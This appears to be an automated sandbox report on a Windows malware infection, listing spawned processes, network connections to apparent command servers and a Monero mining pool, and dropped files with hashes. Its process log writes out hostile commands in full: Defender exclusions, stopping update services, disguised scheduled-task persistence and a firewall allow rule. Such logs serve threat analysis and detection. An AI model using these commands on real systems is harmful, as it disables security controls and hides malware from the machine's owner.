"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 784

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\FEE7.exe

C:\Users\Admin\AppData\Local\Temp\FEE7.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4268 -ip 4268

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 540

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp" /SL5="$9005E,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4908 -ip 4908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 572

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\98E6.exe

C:\Users\Admin\AppData\Local\Temp\98E6.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 198.209.218.23.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.97.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 163.172.154.142:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 142.154.172.163.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 4ae7d634-9a1d-4039-90ed-76defb0dd612.uuid.datadumpcloud.org udp
US 8.8.8.8:53 80.190.68.51.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp

Files

memory/5000-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5000-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3284-2-0x0000000000CE0000-0x0000000000CF6000-memory.dmp

memory/5000-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

MD5 3323195a56ab4ecbd18a088c6c5fd2eb
SHA1 2cc0b6798b4f3b5c62dd85421ec9d519444b944a
SHA256 f4838fd962450fe30a3189031d10a08a0f703fc7fd0dd212374bed41de10b37c
SHA512 4cc29d19dd5725781dd4f48ad508ee7efc79e1a42836221c93bb99c2ee2cc38d2f3494e983a545f84a1e3f1ec0c5f74744e6f6b65d72be610da175a96f6585be

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

MD5 3323195a56ab4ecbd18a088c6c5fd2eb
SHA1 2cc0b6798b4f3b5c62dd85421ec9d519444b944a
SHA256 f4838fd962450fe30a3189031d10a08a0f703fc7fd0dd212374bed41de10b37c
SHA512 4cc29d19dd5725781dd4f48ad508ee7efc79e1a42836221c93bb99c2ee2cc38d2f3494e983a545f84a1e3f1ec0c5f74744e6f6b65d72be610da175a96f6585be

C:\Users\Admin\AppData\Local\Temp\A053.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\A053.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

MD5 c9fecce5ddbbb4c08036eb804806585a
SHA1 de118ddb2f2b644a73e314d1bfc9ff777b84c41c
SHA256 453554affb4477ef1397310265a6a90ae0953e5bca58d9b7b98e7323e7cccdf6
SHA512 59be1a656c71b2dd3a2891a6b27e842f808074dffdd1b954d0ee781bab2183b048263e9381489223d97e74aff6cd8bfa825cab657c4b9aa9eba9d7f8d234faff

C:\Users\Admin\AppData\Local\Temp\A11F.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\A298.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

MD5 c9fecce5ddbbb4c08036eb804806585a
SHA1 de118ddb2f2b644a73e314d1bfc9ff777b84c41c
SHA256 453554affb4477ef1397310265a6a90ae0953e5bca58d9b7b98e7323e7cccdf6
SHA512 59be1a656c71b2dd3a2891a6b27e842f808074dffdd1b954d0ee781bab2183b048263e9381489223d97e74aff6cd8bfa825cab657c4b9aa9eba9d7f8d234faff

C:\Users\Admin\AppData\Local\Temp\A298.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

MD5 f0c7089254a00e815feae5d8181b7f05
SHA1 f3b024cb82395c32629ac49898728fd5010c26cf
SHA256 37bef7fe1c718f9ee1ffa18fe8fb3a516d1f464aaa536f02c18f1b63b58edd73
SHA512 b8fa039c87837355afed88b3b77abfabda3d30a2e887adac620ac204eb6bc30bac809ed6092d837424f3a2c0324641d057c3f90e100634396bb0fa27d4e3f6e0

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

MD5 f0c7089254a00e815feae5d8181b7f05
SHA1 f3b024cb82395c32629ac49898728fd5010c26cf
SHA256 37bef7fe1c718f9ee1ffa18fe8fb3a516d1f464aaa536f02c18f1b63b58edd73
SHA512 b8fa039c87837355afed88b3b77abfabda3d30a2e887adac620ac204eb6bc30bac809ed6092d837424f3a2c0324641d057c3f90e100634396bb0fa27d4e3f6e0

C:\Users\Admin\AppData\Local\Temp\A345.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\A345.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

MD5 b4050b917e28921affbf2dffa8246e5c
SHA1 44d3497d429695898e5230916d0ef0924d97c660
SHA256 8a14bc158f2bab49eafd556bd51635a7102b322a4debb1f63fcb57dcb7f745f1
SHA512 3680bf7579f36bcf440c349ea41f872bc36ca45297d1c384120844e86a3d8bf7e9c1af615dac4f6e93c5f32bcf3adfe95dbffaea802a2bcd2504395aa8abfa83

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

MD5 b4050b917e28921affbf2dffa8246e5c
SHA1 44d3497d429695898e5230916d0ef0924d97c660
SHA256 8a14bc158f2bab49eafd556bd51635a7102b322a4debb1f63fcb57dcb7f745f1
SHA512 3680bf7579f36bcf440c349ea41f872bc36ca45297d1c384120844e86a3d8bf7e9c1af615dac4f6e93c5f32bcf3adfe95dbffaea802a2bcd2504395aa8abfa83

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

MD5 4d6df12a24cadf74e6bf1190c60fdda2
SHA1 7eaadf868c91ab8138f20f300b3b1258c83608fe
SHA256 03dd8bac72407083fc3d0017dcb1f7733700c553eaf4676f4505b20fb1d34d99
SHA512 3421f21c5a3cb33a08a716de494a2cb58443b6a99cd47e13be3666a0ec671f48e50c032f0c8b96dbaa47bd77031b69c69ef29fb830b995f272f92eac1e8411a1

memory/3900-70-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/980-71-0x0000000000540000-0x000000000054A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

MD5 7251c994d90ff3fd8068854ccd67a748
SHA1 3e536fbb4b8d12e90eb0a67a7f728ee1479d0f19
SHA256 cd17f994e3027975bda505f96d1b218bbbd059c472495be222437a7aae651292
SHA512 87239c495e10298df1427c2dbaf1c8f93705f89e9bb95dfdd45554fe7cecee7e1bed80586369893262fd26f4d740fdb3de99cf7c3601375d68143765d26d841a

memory/980-75-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/3900-76-0x00000000005B0000-0x00000000005EE000-memory.dmp

memory/3900-84-0x00000000079B0000-0x0000000007F54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/3900-88-0x00000000074A0000-0x0000000007532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

MD5 7251c994d90ff3fd8068854ccd67a748
SHA1 3e536fbb4b8d12e90eb0a67a7f728ee1479d0f19
SHA256 cd17f994e3027975bda505f96d1b218bbbd059c472495be222437a7aae651292
SHA512 87239c495e10298df1427c2dbaf1c8f93705f89e9bb95dfdd45554fe7cecee7e1bed80586369893262fd26f4d740fdb3de99cf7c3601375d68143765d26d841a

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

